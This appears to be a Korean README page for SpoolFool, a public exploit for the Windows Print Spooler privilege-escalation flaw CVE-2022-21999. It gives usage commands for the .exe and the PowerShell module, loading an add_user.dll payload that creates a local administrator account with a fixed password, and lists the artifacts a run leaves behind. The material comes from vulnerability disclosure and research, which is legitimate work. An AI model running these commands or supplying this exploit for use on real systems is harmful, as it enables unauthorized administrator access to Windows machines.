
CVE-2022-21999 익스플로잇 - Windows 인쇄 스풀러 권한 상승 취약점 (LPE)
CVE-2022-21999 - Windows Print Spooler 권한 상승 취약점(LPE) 익스플로잇
제공된 익스플로잇은 기본적으로 모든 Windows 데스크톱 버전에서 작동합니다.
전체 기술적 세부 사항은 여기 블로그 게시물을 참조하세요.
PS C:\SpoolFool> .\SpoolFool.exe
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
C:\SpoolFool\SpoolFool.exe -dll add_user.dll
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -dir 'SECRET'
C:\SpoolFool\SpoolFool.exe -dll add_user.dll -printer 'My Printer' -dir 'SECRET'
PS C:\SpoolFool> ipmo .\SpoolFool.ps1
PS C:\SpoolFool> Invoke-SpoolFool
SpoolFool
By Oliver Lyak (@ly4k_)
Examples:
-dll add_user.dll
-dll add_user.dll -printer 'My Printer'
-dll add_user.dll -dir 'SECRET'
-dll add_user.dll -printer 'My Printer' -dir 'SECRET'
다음 PoC는 새 로컬 관리자 admin / Passw0rd!를 생성하는 DLL을 사용합니다. DLL(AddUser.dll)과 소스 코드는 이 리포지토리에서 찾을 수 있습니다.

두 번째 실행
다음 PoC는 제공된 익스플로잇을 두 번째 실행하는 것을 보여줍니다. 이번에는 DLL을 로드하기 위해 취약점을 악용하지 않는다는 점에 유의하세요.

익스플로잇이 실행된 후, 나중에 정리를 위해 다음 아티팩트가 남게 됩니다:
SpoolDirectory 값은 복원되지 않습니다